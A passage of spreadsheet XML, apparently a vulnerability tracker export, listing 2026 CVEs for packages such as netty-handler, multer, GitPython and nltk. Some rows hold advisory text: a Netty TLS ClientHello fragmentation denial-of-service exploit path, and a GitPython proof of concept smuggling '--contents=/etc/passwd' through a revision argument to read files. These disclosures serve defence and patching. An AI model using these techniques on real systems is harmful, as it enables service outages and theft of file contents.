Reported by tonghuaroot (tonghuaroot@gmail.com).</t></is></c><c r="T21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t></is></c></row><row r="22"><c r="A22" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B22" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C22" s="5" t="inlineStr"><is><t>CVE-2026-73262</t></is></c><c r="D22" s="5" t="inlineStr" /><c r="E22" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F22" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G22" s="5" t="inlineStr" /><c r="H22" s="5" t="n"><v>0.002</v></c><c r="I22" s="5" t="inlineStr" /><c r="J22" s="5" t="inlineStr" /><c r="K22" s="5" t="inlineStr" /><c r="L22" s="5" t="inlineStr"><is><t>PyPI:prowler, PyPI:prowler-cloud</t></is></c><c r="M22" s="5" t="inlineStr"><is><t>5.37.0</t></is></c><c r="N22" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P22" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q22" s="5" t="inlineStr" /><c r="R22" s="5" t="inlineStr" /><c r="S22" s="5" t="inlineStr"><is><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is></c><c r="T22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73262</t></is></c></row><row r="23"><c r="A23" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B23" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C23" s="5" t="inlineStr"><is><t>CVE-2026-73294</t></is></c><c r="D23" s="5" t="inlineStr" /><c r="E23" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F23" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G23" s="5" t="inlineStr" /><c r="H23" s="5" t="n"><v>0.006</v></c><c r="I23" s="5" t="inlineStr" /><c r="J23" s="5" t="inlineStr" /><c r="K23" s="5" t="inlineStr" /><c r="L23" s="5" t="inlineStr"><is><t>Go:github.com/semaphoreui/semaphore</t></is></c><c r="M23" s="5" t="inlineStr"><is><t>0.0.0-20260704181911-7e8a9434bd81</t></is></c><c r="N23" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P23" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q23" s="5" t="inlineStr" /><c r="R23" s="5" t="inlineStr" /><c r="S23" s="5" t="inlineStr"><is><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is></c><c r="T23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73294</t></is></c></row><row r="24"><c r="A24" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B24" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C24" s="5" t="inlineStr"><is><t>CVE-2026-73558</t></is></c><c r="D24" s="5" t="inlineStr" /><c r="E24" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F24" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G24" s="5" t="inlineStr" /><c r="H24" s="5" t="n"><v>0.003</v></c><c r="I24" s="5" t="inlineStr" /><c r="J24" s="5" t="inlineStr" /><c r="K24" s="5" t="inlineStr" /><c r="L24" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M24" s="5" t="inlineStr"><is><t>0.27.0</t></is></c><c r="N24" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O24" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P24" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q24" s="5" t="inlineStr" /><c r="R24" s="5" t="inlineStr" /><c r="S24" s="5" t="inlineStr"><is><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is></c><c r="T24" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73558</t></is></c></row><row r="25"><c r="A25" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B25" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C25" s="5" t="inlineStr"><is><t>CVE-2026-73560</t></is></c><c r="D25" s="5" t="inlineStr" /><c r="E25" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F25" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G25" s="5" t="inlineStr" /><c r="H25" s="5" t="n"><v>0.003</v></c><c r="I25" s="5" t="inlineStr" /><c r="J25" s="5" t="inlineStr" /><c r="K25" s="5" t="inlineStr" /><c r="L25" s="5" t="inlineStr"><is><t>PyPI:vllm</t></is></c><c r="M25" s="5" t="inlineStr"><is><t>0.26.0</t></is></c><c r="N25" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O25" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P25" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q25" s="5" t="inlineStr" /><c r="R25" s="5" t="inlineStr" /><c r="S25" s="5" t="inlineStr"><is><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is></c><c r="T25" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73560</t></is></c></row><row r="26"><c r="A26" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B26" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C26" s="5" t="inlineStr"><is><t>CVE-2026-75595</t></is></c><c r="D26" s="5" t="inlineStr" /><c r="E26" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F26" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G26" s="5" t="inlineStr" /><c r="H26" s="5" t="n"><v>0.003</v></c><c r="I26" s="5" t="inlineStr" /><c r="J26" s="5" t="inlineStr" /><c r="K26" s="5" t="inlineStr" /><c r="L26" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M26" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N26" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O26" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P26" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q26" s="5" t="inlineStr" /><c r="R26" s="5" t="inlineStr" /><c r="S26" s="5" t="inlineStr"><is><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is></c><c r="T26" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75595</t></is></c></row><row r="27"><c r="A27" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B27" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C27" s="5" t="inlineStr"><is><t>CVE-2026-75596</t></is></c><c r="D27" s="5" t="inlineStr" /><c r="E27" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F27" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G27" s="5" t="inlineStr" /><c r="H27" s="5" t="n"><v>0.004</v></c><c r="I27" s="5" t="inlineStr" /><c r="J27" s="5" t="inlineStr" /><c r="K27" s="5" t="inlineStr" /><c r="L27" s="5" t="inlineStr"><is><t>Maven:io.netty:netty-handler</t></is></c><c r="M27" s="5" t="inlineStr"><is><t>4.1.137.Final, 4.2.17.Final</t></is></c><c r="N27" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O27" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P27" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q27" s="5" t="inlineStr" /><c r="R27" s="5" t="inlineStr" /><c r="S27" s="5" t="inlineStr"><is><t>### Summary

Netty's default SNI entrypoint reparses and recopies previously received ClientHello fragments on every additional TLS handshake record. A remote peer can send a small first record that advertises a large ClientHello length and then drip the body in many tiny records, causing **superlinear (quadratic) CPU work** before the handshake completes. With 4095 one-byte fragments, the handler recopies **8,386,560 bytes** from only **24,579 bytes** on the wire — a **341× amplification** ratio.

### Affected Entrypoints

- `io.netty.handler.ssl.SniHandler` — default constructors
- `io.netty.handler.ssl.SslClientHelloHandler` — pre-handshake ClientHello aggregation path

### Vulnerable Code Locations

- `handler/src/main/java/io/netty/handler/ssl/SniHandler.java:85`
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:75` (decode entry)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:165` (handshakeBuffer.clear)
- `handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java:174` (writeBytes re-copy)
- `codec-base/src/main/java/io/netty/handler/codec/ByteToMessageDecoder.java:294` (cumulation retention)

### Exploit Path

```
1. TCP connection → SniHandler → SslClientHelloHandler.decode
2. First record: TLS handshake header declaring large ClientHello length (e.g., 4096 bytes)
3. Attacker sends thousands of tiny follow-on handshake records (1 byte each)
4. On each fragment: handshakeBuffer.clear() + writeBytes() re-copies ALL accumulated body bytes
5. Total bytes copied = n*(n+1)/2 where n = number of body bytes → quadratic
6. Event-loop CPU exhausted before SslHandler takes over
```

### Impact

- **Vulnerability Type:** Inefficient Algorithmic Complexity
- An unauthenticated network attacker can drive disproportionate CPU consumption on the Netty event loop
- Affects **all** Netty deployments using `SniHandler` for TLS termination (the default SNI path)
- No privileges, user interaction, or special configuration required
- Can degrade or stall TLS connection handling for all clients on the affected event loop
- The attack requires only modest bandwidth (~25 KB) to trigger significant CPU work

---
### Credits

Found by a security research team from the University of Sydney, focusing on detecting open source software vulnerabilities.
Liyi Zhou: https://lzhou1110.github.io/
Ziyue Wang: https://zyy0530.github.io/
Strick: https://str1ckl4nd.github.io/
Maurice: https://maurice.busystar.org/
Chenchen Yu: https://7thparkk.github.io/</t></is></c><c r="T27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t></is></c></row><row r="28"><c r="A28" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B28" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C28" s="5" t="inlineStr"><is><t>CVE-2026-75604</t></is></c><c r="D28" s="5" t="inlineStr" /><c r="E28" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F28" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G28" s="5" t="inlineStr" /><c r="H28" s="5" t="n"><v>0.025</v></c><c r="I28" s="5" t="inlineStr" /><c r="J28" s="5" t="inlineStr" /><c r="K28" s="5" t="inlineStr" /><c r="L28" s="5" t="inlineStr"><is><t>npm:next</t></is></c><c r="M28" s="5" t="inlineStr"><is><t>15.5.24, 16.3.3</t></is></c><c r="N28" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q28" s="5" t="inlineStr" /><c r="R28" s="5" t="inlineStr" /><c r="S28" s="5" t="inlineStr"><is><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is></c><c r="T28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t></is></c></row><row r="29"><c r="A29" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B29" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C29" s="5" t="inlineStr"><is><t>CVE-2026-77037</t></is></c><c r="D29" s="5" t="inlineStr" /><c r="E29" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F29" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G29" s="5" t="inlineStr" /><c r="H29" s="5" t="n"><v>0.003</v></c><c r="I29" s="5" t="inlineStr" /><c r="J29" s="5" t="inlineStr" /><c r="K29" s="5" t="inlineStr" /><c r="L29" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M29" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N29" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O29" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P29" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q29" s="5" t="inlineStr" /><c r="R29" s="5" t="inlineStr" /><c r="S29" s="5" t="inlineStr"><is><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is></c><c r="T29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77037</t></is></c></row><row r="30"><c r="A30" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B30" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C30" s="5" t="inlineStr"><is><t>CVE-2026-77063</t></is></c><c r="D30" s="5" t="inlineStr" /><c r="E30" s="5" t="inlineStr"><is><t>LOW</t></is></c><c r="F30" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G30" s="5" t="inlineStr" /><c r="H30" s="5" t="n"><v>0.002</v></c><c r="I30" s="5" t="inlineStr" /><c r="J30" s="5" t="inlineStr" /><c r="K30" s="5" t="inlineStr" /><c r="L30" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M30" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N30" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O30" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P30" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q30" s="5" t="inlineStr" /><c r="R30" s="5" t="inlineStr" /><c r="S30" s="5" t="inlineStr"><is><t>### Impact

When `multer` is configured with an asynchronous `fileFilter`, the `limits.fileSize` limit can be bypassed. The `'limit'` event is registered inside the async `fileFilter` callback, so if a file exceeds `limits.fileSize` before that callback runs, the event is missed and the oversized upload is accepted instead of being rejected with a `LIMIT_FILE_SIZE` error. Applications that rely on `limits.fileSize` to reject oversized uploads are affected on all upload methods (`.single()`, `.array()`, `.fields()`, `.any()`). Uploads using a synchronous `fileFilter` are not affected.

### Patches

Users should upgrade to `2.3.0`.

### Workarounds

Use a synchronous `fileFilter`, or validate the uploaded file size after the upload completes.</t></is></c><c r="T30" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77063</t></is></c></row><row r="31"><c r="A31" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B31" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C31" s="5" t="inlineStr"><is><t>CVE-2026-77078</t></is></c><c r="D31" s="5" t="inlineStr" /><c r="E31" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F31" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G31" s="5" t="inlineStr" /><c r="H31" s="5" t="n"><v>0.003</v></c><c r="I31" s="5" t="inlineStr" /><c r="J31" s="5" t="inlineStr" /><c r="K31" s="5" t="inlineStr" /><c r="L31" s="5" t="inlineStr"><is><t>npm:multer</t></is></c><c r="M31" s="5" t="inlineStr"><is><t>2.3.0</t></is></c><c r="N31" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O31" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P31" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q31" s="5" t="inlineStr" /><c r="R31" s="5" t="inlineStr" /><c r="S31" s="5" t="inlineStr"><is><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is></c><c r="T31" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t></is></c></row><row r="32"><c r="A32" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B32" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C32" s="5" t="inlineStr"><is><t>CVE-2026-78675</t></is></c><c r="D32" s="5" t="inlineStr" /><c r="E32" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F32" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G32" s="5" t="inlineStr" /><c r="H32" s="5" t="n"><v>0.001</v></c><c r="I32" s="5" t="inlineStr" /><c r="J32" s="5" t="inlineStr" /><c r="K32" s="5" t="inlineStr" /><c r="L32" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M32" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N32" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O32" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P32" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q32" s="5" t="inlineStr" /><c r="R32" s="5" t="inlineStr" /><c r="S32" s="5" t="inlineStr"><is><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is></c><c r="T32" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t></is></c></row><row r="33"><c r="A33" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B33" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C33" s="5" t="inlineStr"><is><t>CVE-2026-78676</t></is></c><c r="D33" s="5" t="inlineStr" /><c r="E33" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F33" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G33" s="5" t="inlineStr" /><c r="H33" s="5" t="n"><v>0.004</v></c><c r="I33" s="5" t="inlineStr" /><c r="J33" s="5" t="inlineStr" /><c r="K33" s="5" t="inlineStr" /><c r="L33" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M33" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N33" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O33" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P33" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q33" s="5" t="inlineStr" /><c r="R33" s="5" t="inlineStr" /><c r="S33" s="5" t="inlineStr"><is><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is></c><c r="T33" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t></is></c></row><row r="34"><c r="A34" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B34" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C34" s="5" t="inlineStr"><is><t>CVE-2026-78677</t></is></c><c r="D34" s="5" t="inlineStr" /><c r="E34" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F34" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G34" s="5" t="inlineStr" /><c r="H34" s="5" t="n"><v>0.004</v></c><c r="I34" s="5" t="inlineStr" /><c r="J34" s="5" t="inlineStr" /><c r="K34" s="5" t="inlineStr" /><c r="L34" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M34" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N34" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O34" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P34" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q34" s="5" t="inlineStr" /><c r="R34" s="5" t="inlineStr" /><c r="S34" s="5" t="inlineStr"><is><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is></c><c r="T34" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t></is></c></row><row r="35"><c r="A35" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B35" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C35" s="5" t="inlineStr"><is><t>CVE-2026-78678</t></is></c><c r="D35" s="5" t="inlineStr" /><c r="E35" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F35" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G35" s="5" t="inlineStr" /><c r="H35" s="5" t="n"><v>0.002</v></c><c r="I35" s="5" t="inlineStr" /><c r="J35" s="5" t="inlineStr" /><c r="K35" s="5" t="inlineStr" /><c r="L35" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M35" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N35" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O35" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P35" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q35" s="5" t="inlineStr" /><c r="R35" s="5" t="inlineStr" /><c r="S35" s="5" t="inlineStr"><is><t>## Summary
`Repo.blame()` / `Repo.blame_incremental()` guard forwarded revision options against `unsafe_git_revision_options`, but that denylist only contains the file-WRITE options `--output`/`-o`. `git blame` also honors `--contents &lt;file&gt;` and `-S &lt;file&gt;`, which cause the file's lines to be echoed into the blame result — an arbitrary file READ. Neither option is in the denylist, so a caller-influenced revision value of `--contents=&lt;path&gt;` passes the guard and leaks file contents. This is a distinct sink-option and impact class (READ) from GHSA-956x-8gvw-wg5v (which addressed the blame `--output` WRITE), directly analogous to GHSA-539m-9xh6-q6rr (archive READ gap accepted separately from the archive write/exec advisory).

## Root Cause
`unsafe_git_revision_options = ["--output","-o"]` (`git/repo/base.py:188`). The `rev` string is passed to `_option_candidates([rev], kwargs)` and placed BEFORE the `--` separator (base.py:841). The canonical name of `--contents=...` is `contents`, which is not on the denylist, so no `UnsafeOptionError` is raised. The trailing `--` protects only the pathspec, not the option before the revision.

## Impact
Arbitrary local file read at the privileges of the host process; the file's line contents appear in the blame result returned to the caller. Pure VALUE control (the caller forwards a user-influenced revision string). Default `allow_unsafe_options=False`.

## Proof of Concept
```python
result = repo.blame("--contents=/etc/passwd", "a.txt")
# result rows carry the victim file's line text
```

## Attack Chain
1. Entry: app calls `repo.blame(rev, file)` with attacker `rev="--contents=/etc/passwd"` (or kwarg `contents="/etc/passwd"`, or `-S`).
2. Check: `Git.check_unsafe_options(_option_candidates([rev,...], kwargs), unsafe_git_revision_options)` @ base.py:841. Guard: denylist = `["--output","-o"]` only. Bypass proof: canonical name `contents` ∉ denylist → no error.
3. Sink: `self.git.blame(rev, "--", file, p=True, ...)`. argv (observed): `['git','blame','-p','--contents=&lt;secret&gt;','HEAD','--','a.txt']`.
4. Impact: blame result rows carry the victim file's line text.

## Bypass Evidence
Independently reproduced (independent test harness, default `allow_unsafe_options=False`): `blame('--contents=&lt;secret&gt;','a.txt')` → guard PASSED; result rows = `['GATE_SECRET_LINE_A','GATE_SECRET_LINE_B']`. Control: `blame('--output=…')` still BLOCKED (guard active on this path). `-S` kwarg argv also reaches git unguarded.

## Affected Versions
`GitPython &lt;= 3.1.58` (denylist present verbatim on the latest release tag).

## Suggested Fix
Prefer an allowlist of blame options; at minimum add `--contents`/`-S` (and any other path-taking blame options) to `unsafe_git_revision_options`, and make the membership rule "the option takes a filesystem path" rather than "the option writes output".

---
Reported by **zx (Jace)** — GitHub: @manus-use</t></is></c><c r="T35" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78678</t></is></c></row><row r="36"><c r="A36" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B36" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C36" s="5" t="inlineStr"><is><t>CVE-2026-78679</t></is></c><c r="D36" s="5" t="inlineStr" /><c r="E36" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F36" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G36" s="5" t="inlineStr" /><c r="H36" s="5" t="n"><v>0.002</v></c><c r="I36" s="5" t="inlineStr" /><c r="J36" s="5" t="inlineStr" /><c r="K36" s="5" t="inlineStr" /><c r="L36" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M36" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N36" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O36" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P36" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q36" s="5" t="inlineStr" /><c r="R36" s="5" t="inlineStr" /><c r="S36" s="5" t="inlineStr"><is><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is></c><c r="T36" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78679</t></is></c></row><row r="37"><c r="A37" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B37" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C37" s="5" t="inlineStr"><is><t>CVE-2026-78681</t></is></c><c r="D37" s="5" t="inlineStr" /><c r="E37" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F37" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G37" s="5" t="inlineStr" /><c r="H37" s="5" t="n"><v>0.003</v></c><c r="I37" s="5" t="inlineStr" /><c r="J37" s="5" t="inlineStr" /><c r="K37" s="5" t="inlineStr" /><c r="L37" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M37" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N37" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O37" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P37" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q37" s="5" t="inlineStr" /><c r="R37" s="5" t="inlineStr" /><c r="S37" s="5" t="inlineStr"><is><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is></c><c r="T37" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t></is></c></row><row r="38"><c r="A38" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B38" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C38" s="5" t="inlineStr"><is><t>CVE-2026-78682</t></is></c><c r="D38" s="5" t="inlineStr" /><c r="E38" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F38" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G38" s="5" t="inlineStr" /><c r="H38" s="5" t="n"><v>0.003</v></c><c r="I38" s="5" t="inlineStr" /><c r="J38" s="5" t="inlineStr" /><c r="K38" s="5" t="inlineStr" /><c r="L38" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M38" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N38" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O38" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P38" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q38" s="5" t="inlineStr" /><c r="R38" s="5" t="inlineStr" /><c r="S38" s="5" t="inlineStr"><is><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is></c><c r="T38" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78682</t></is></c></row><row r="39"><c r="A39" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B39" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C39" s="5" t="inlineStr"><is><t>CVE-2026-78683</t></is></c><c r="D39" s="5" t="inlineStr" /><c r="E39" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F39" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G39" s="5" t="inlineStr" /><c r="H39" s="5" t="n"><v>0.003</v></c><c r="I39" s="5" t="inlineStr" /><c r="J39" s="5" t="inlineStr" /><c r="K39" s="5" t="inlineStr" /><c r="L39" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M39" s="5" t="inlineStr"><is><t>3.10.0</t></is></c><c r="N39" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O39" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P39" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q39" s="5" t="inlineStr" /><c r="R39" s="5" t="inlineStr" /><c r="S39" s="5" t="inlineStr"><is><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is></c><c r="T39" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78683</t></is></c></row><row r="40"><c r="A40" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B40" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C40" s="5" t="inlineStr"><is><t>CVE-2026-79657</t></is></c><c r="D40" s="5" t="inlineStr" /><c r="E40" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F40" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G40" s="5" t="inlineStr" /><c r="H40" s="5" t="n"><v>0.012</v></c><c r="I40" s="5" t="inlineStr" /><c r="J40" s="5" t="inlineStr" /><c r="K40" s="5" t="inlineStr" /><c r="L40" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M40" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N40" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O40" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P40" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q40" s="5" t="inlineStr" /><c r="R40" s="5" t="inlineStr" /><c r="S40" s="5" t="inlineStr"><is><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is></c><c r="T40" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79657</t></is></c></row><row r="41"><c r="A41" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B41" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C41" s="5" t="inlineStr"><is><t>CVE-2026-79674</t></is></c><c r="D41" s="5" t="inlineStr" /><c r="E41" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F41" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G41" s="5" t="inlineStr" /><c r="H41" s="5" t="n"><v>0.002</v></c><c r="I41" s="5" t="inlineStr" /><c r="J41" s="5" t="inlineStr" /><c r="K41" s="5" t="inlineStr" /><c r="L41" s="5" t="inlineStr"><is><t>PyPI:nltk</t></is></c><c r="M41" s="5" t="inlineStr"><is><t>3.10.3</t></is></c><c r="N41" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O41" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P41" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q41" s="5" t="inlineStr" /><c r="R41" s="5" t="inlineStr" /><c r="S41" s="5" t="inlineStr"><is><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is></c><c r="T41" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79674</t></is></c></row><row r="42"><c 